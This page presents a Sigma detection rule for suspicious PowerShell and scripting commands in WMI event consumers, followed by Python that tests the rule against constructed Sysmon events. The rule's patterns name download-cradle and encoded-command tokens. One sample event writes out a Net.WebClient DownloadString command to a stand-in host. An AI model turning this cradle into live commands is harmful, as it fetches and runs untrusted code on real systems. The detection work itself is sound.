Techniques
Sample rules
Suspicious Scripting in a WMI Consumer
- source: sigma
- techniques:
- t1059
- t1059.005
Description
Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers
Detection logic
selection_destination:
    - Destination|contains|all:
        - 'new-object'
        - 'net.webclient'
        - '.downloadstring'
    - Destination|contains|all:
        - 'new-object'
        - 'net.webclient'
        - '.downloadfile'
    - Destination|contains:
        - ' iex('
        - ' -nop '
        - ' -noprofile '
        - ' -decode '
        - ' -enc '
        - 'WScript.Shell'
        - 'System.Security.Cryptography.FromBase64Transform'
condition: selection_destination
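The selection above is a list of three maps, so they are OR'd together: the two `contains|all` entries need every listed substring, the plain `contains` entry needs any one of them, and Sigma string matching is case-insensitive. The following Python is an added example, not part of the Sigma rule or its repository, that applies that logic to constructed Sysmon Event ID 20 (WmiEvent consumer) records whose `Destination` field holds the consumer's command line or script text.

```python
# Added example: evaluates selection_destination against constructed WMI consumer events.
# All comparisons lowercase both sides because Sigma 'contains' is case-insensitive.

CONTAINS_ALL_GROUPS = [
    ["new-object", "net.webclient", ".downloadstring"],
    ["new-object", "net.webclient", ".downloadfile"],
]
CONTAINS_ANY = [
    " iex(", " -nop ", " -noprofile ", " -decode ", " -enc ",
    "WScript.Shell", "System.Security.Cryptography.FromBase64Transform",
]


def matches_rule(event: dict) -> bool:
    """True when the event's Destination field satisfies selection_destination."""
    dest = str(event.get("Destination", "")).lower()
    # List items under a selection are OR'd; 'contains|all' requires every substring.
    for group in CONTAINS_ALL_GROUPS:
        if all(needle in dest for needle in group):
            return True
    # Plain 'contains' requires at least one of the listed substrings.
    return any(needle.lower() in dest for needle in CONTAINS_ANY)


# Constructed sample events (not real telemetry) in a flattened Sysmon EventID 20 shape.
SAMPLE_EVENTS = [
    {"EventID": 20, "Name": "Updater", "Type": "Command Line",
     "Destination": "powershell.exe -NoP -c \"(New-Object Net.WebClient).DownloadString('http://example.invalid/a')\""},
    {"EventID": 20, "Name": "Cleanup", "Type": "Command Line",
     "Destination": "cmd.exe /c del C:\\Temp\\*.tmp"},
    {"EventID": 20, "Name": "Loader", "Type": "Active Script",
     "Destination": "CreateObject(\"WScript.Shell\").Run(\"notepad.exe\")"},
    {"EventID": 20, "Name": "Inventory", "Type": "Command Line",
     "Destination": "powershell.exe -Command Get-WmiObject Win32_OperatingSystem"},
]


def alerting_consumers(events) -> list:
    """Names of EventID 20 consumers that trigger the rule."""
    return [e["Name"] for e in events if e.get("EventID") == 20 and matches_rule(e)]


if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print(f"{e['Name']:<10} {'ALERT' if matches_rule(e) else 'ok'}")
```

Note that the `' -enc '`-style tokens carry a leading and trailing space, so a switch that ends the field without a trailing space will not match; that is how the rule as written behaves, and the example reproduces it rather than correcting it.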